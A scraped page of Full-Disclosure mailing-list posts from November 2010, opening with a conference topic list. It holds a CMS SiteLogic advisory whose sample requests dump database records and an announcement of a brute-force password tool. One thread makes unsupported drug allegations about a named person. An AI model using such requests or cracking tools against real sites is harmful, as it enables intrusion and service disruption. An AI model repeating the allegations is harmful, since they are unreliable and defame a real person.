Communication theory Fundamentals in communication theory; Communications switching and routing; Communications modeling; Communications security; Autonomic communications; Performance in communications; Computer communications; Distributed communications; Wired and wireless communications; Signal processing in communications; Multimedia and multicast communications; High-speed communications; Delay-tolerant communications; Fault-tolerant networks; Reliable and safe communications; Iterative coding and decoding techniques Reliability Reliability modeling; Reliability stress analysis; Dependency-related reliability; Reliability prediction technologies; Reliability-aware topology control; Reliability in highly dynamic networks and distributed systems; Reliability in sensitive networks (ehealth, financial, etc.); Service versus network reliability; Reliability and human-related risks; Software reliability; Software-based safety kernels; Reliability testing; Maintenance tools for system reliability; QoS-driven reliability; Quality of Service QoS Design and architectures for networks and distributed systems; QoS modeling, adaptation and monitoring; QoS policy assessment; QoS metrics and measurement; QoS-based routing; QoS-aware applications and services; Provisioning and monitoring QoS constraints; QoS-based admission control; QoS negotiation and mediation; User-profile QoS-aware mechanisms; QoS-network device mechanisms (scheduling, queue management, traffic engineering, etc.); QoS and opportunistic scheduling; QoS-aware resource management; QoS in WLAN, WPAN, WMAN and WiMAX (IEEE 802.11/15/16/20); QoS in wireless sensor and ad hoc networks; QoS support in wireless networks for MAC protocols; QoS and survivability in mobile environments; --- CTRQ Steering Committee Eugen Borcoci, Politehnica University of Bucharest, Romania Joel Rodrigues, Instituto de Telecomunicações / University of Beira Interior, Portugal Pascal Lorenz, University of Haute Alsace, France Zary Segall, University of Maryland, USA Michel Diaz, LAAS, France CTRQ Advisory Chairs Javier Del Ser Lorente, TECNALIA RESEARCH INNOVATION - Zamudio, Spain Bogdan Ghita, University of Plymouth, UK Raj Jain, Washington University in St. Louis, USA CTRQ Industry/Research Chairs Xuewen Gong, Huawei Technologies, China Maria Striki, Telcordia Tehnologies Inc., USA CTRQ Publicity Chair Alejandro Canovas Solbes, Polytechnic University of Valencia, Spain Committee: http://www.iaria.org/conferences2011/ComCTRQ11.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan,...
You forgot to add sponsored by Apple at the end of your message (wouldn't have expected apple fanboys in FD...) On Fri, Nov 19, 2010 at 3:49 PM, Andriy Tereshchenko t...@24.odessa.uawrote: Hi, It's no Apple fault, but ATT software QA. I have did software review for one of applications for other major Telko and they has used Device ID as login identifier for one of their POC apps. So this mistake is common. Alternative approach for identification and prefiling inputs was suggested by is usage of iOS property lists. You can take a read a few here: http://developer.apple.com/library/ios/documentation/Cocoa/Conceptual/PropertyLists/QuickStartPlist/QuickStartPlist.html#//apple_ref/doc/uid/1048i-CH4-SW7 Summary: this mean it's not an Apple fault, but ATT developer or contractor who has coded app with auto-filling based on SIM ID. -- Andriy G. Tereshchenko Odessa, Ukraine On Thu, Nov 18, 2010 at 1:16 PM, petrzelkai petrzel...@isometrus.sytes.net wrote: He is indeed mentioned online and he has indeed made important contribution regarding the Apple fiasco with the iPad. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
Hi, It possible to analyze his hair and biological fluids to figure out if he had regular contact with those instances or not. On Thu, Nov 18, 2010 at 9:25 PM, Eyeballing Weev eyeballing.w...@gmail.com wrote: Notice how weev fails to mention his drug charges, like always, and if he does he claims it's some kind of FBI setup like the FBI put LSD in his house plus crack cocaine but he was high as a kite at Toorcon on LSD claiming Firefox bugs for media attention. Did you know most oxycotin addicts smoke crack cocaine when they cannot get their pills? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan,...
Well, If you need reasons to blame Apple - then you can blame them for accepting App in AppStore. Apple is already involved in process of testing ALL apps - so you can request Apple to do more security testing for submitted apps (if you believe in AppStore distribution way). Now it's OK? This posting was never sponsored by Apple. As well it is not powered by Chernobyl Nuclear Power Plant since 2001 -- Andriy G. Tereshchenko Odessa, Ukraine On Fri, Nov 19, 2010 at 5:04 PM, Christian Sciberras uuf6...@gmail.com wrote: You forgot to add sponsored by Apple at the end of your message ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan,...
I don't need any reason to blame anyone. If someone did a mistake, that's a reason in itself. There's no need levelling down that mistake nor make any huge fuss out of it. On Fri, Nov 19, 2010 at 4:13 PM, Andriy Tereshchenko t...@24.odessa.uawrote: Well, If you need reasons to blame Apple - then you can blame them for accepting App in AppStore. Apple is already involved in process of testing ALL apps - so you can request Apple to do more security testing for submitted apps (if you believe in AppStore distribution way). Now it's OK? This posting was never sponsored by Apple. As well it is not powered by Chernobyl Nuclear Power Plant since 2001 -- Andriy G. Tereshchenko Odessa, Ukraine On Fri, Nov 19, 2010 at 5:04 PM, Christian Sciberras uuf6...@gmail.com wrote: You forgot to add sponsored by Apple at the end of your message ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day McSploit - McDonalds Dollar Menu Exploit/Vulnerability Released
On Thu, Nov 18, 2010 at 1:22 PM, savethedollarmenu i...@savethedollarmenu.com wrote: There is a recent 0day vulnerability in the McDonalds dollar menu, namely that it is going to be going away in 2011. fwiw, lobbyists are costly http://online.wsj.com/article/SB10001424052748703431604575522413101063070.html http://www.usatoday.com/money/industries/health/2010-10-07-healthlaw07_ST_N.htm and so are employees http://www.telegraph.co.uk/news/worldnews/southamerica/brazil/8094814/McDonalds-manager-in-Brazil-wins-11000-for-weight-gain.html cheers, --scm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Open Letter to Lee Vartan, Assistant United States Attorney in regards to the Goatse Security iPad case.
So what ? I do care and I am also here. I agree this is not the place for that. But you don't need to give your opinion either, otherwise you do take part into this conversation (and some people may feel insulted). Le jeudi 18 novembre 2010 à 20:53 +0100, Peter Osterberg a écrit : Please don't turn this mail list into something about religion. I couldn't care less about religion, and this is certainly not a religious mail list. I would be on a different list if that was something I cared about. 2010-11-18 20:46, Andrew Auernheimer skrev: Coderman, Everything I do is in service to Christ. I believe it is the opposite: if you truly believe in the life and actions of Christ and you follow his word in completeness, you will soon find yourself persecuted by the Pharisees that run the world. Following Christ and avoiding government sanction are utterly incompatible in this brave new world we live in. Who wants to bow to a lifeless, cold Jesus That all of the preachers have painted their way They hold their revivals, yet worship their idols Serve God in title but to mammon they slave. But the Jesus that I know stood up to rival And calls His disciples to come do the same. On Thu, Nov 18, 2010 at 1:10 PM, coderman coder...@gmail.com wrote: On Wed, Nov 17, 2010 at 11:16 PM, Andrew Auernheimer glutt...@gmail.com wrote: ... Inspired by a sermon I heard at a Mormon stake conference,... lol, wut? maybe if the word of wisdom inspired you more you wouldn't be under fed heaters. can't imagine this thread taking a more surreal, off-topic tangent, but surely weev will deliver! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH scans, i caught one
Another FD reader notified me of this: FirefoxDetected: Trojan.Linux.Small.e: oidentd so apparently it has a trojan aswell in the oidentd file. Grtz, Marco van Berkum ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New vulnerabilities in CMS SiteLogic
Hello Full-Disclosure! I want to warn you about Insufficient Anti-automation and Denial of Service vulnerabilities in CMS SiteLogic (in addition to those multiple vulnerabilities in CMS SiteLogic which I disclosed in 2009-2010). It's Ukrainian commercial CMS. SecurityVulns ID: 11258. - Affected products: - Vulnerable are all versions of CMS SiteLogic with corresponding functionality. -- Details: -- Insufficient Anti-automation (WASC-21): http://site/?mid=1 In contact form there is no protection from automated requests (captcha). DoS (WASC-10): Empty POST request at page http://site in field “Search at the site” shows all records from DB. DoS (WASC-10): http://site/?mid=1action=arhiv At the page of archive all records from DB are showing. Timeline: 2010.08.31 - announced at my site. 2010.09.01 - informed developers. 2010.11.17 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4487/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NiX - Linux Brute Force 1.0.3 update has been released
There are several fixes done in this release compared to the 1st version. It is encouraged to upgrade to the latest version. To those who want to ask, does it outperform Hydra? Yes it does, especially in basic auth and form mode. Full features and download: http://myproxylists.com/nix-brute-force Changelog: http://myproxylists.com/NIX_BRUTE_FORCER.CHANGELOG Regards NiX Lead Developer ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NiX - Linux Brute Force 1.0.3 update has been released
Would you care to offer what particular tests you did to compare your tool to Hydra? Just curious. Ryan On Nov 19, 2010, at 6:52 PM, n...@myproxylists.com wrote: There are several fixes done in this release compared to the 1st version. It is encouraged to upgrade to the latest version. To those who want to ask, does it outperform Hydra? Yes it does, especially in basic auth and form mode. Full features and download: http://myproxylists.com/nix-brute-force Changelog: http://myproxylists.com/NIX_BRUTE_FORCER.CHANGELOG Regards NiX Lead Developer ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/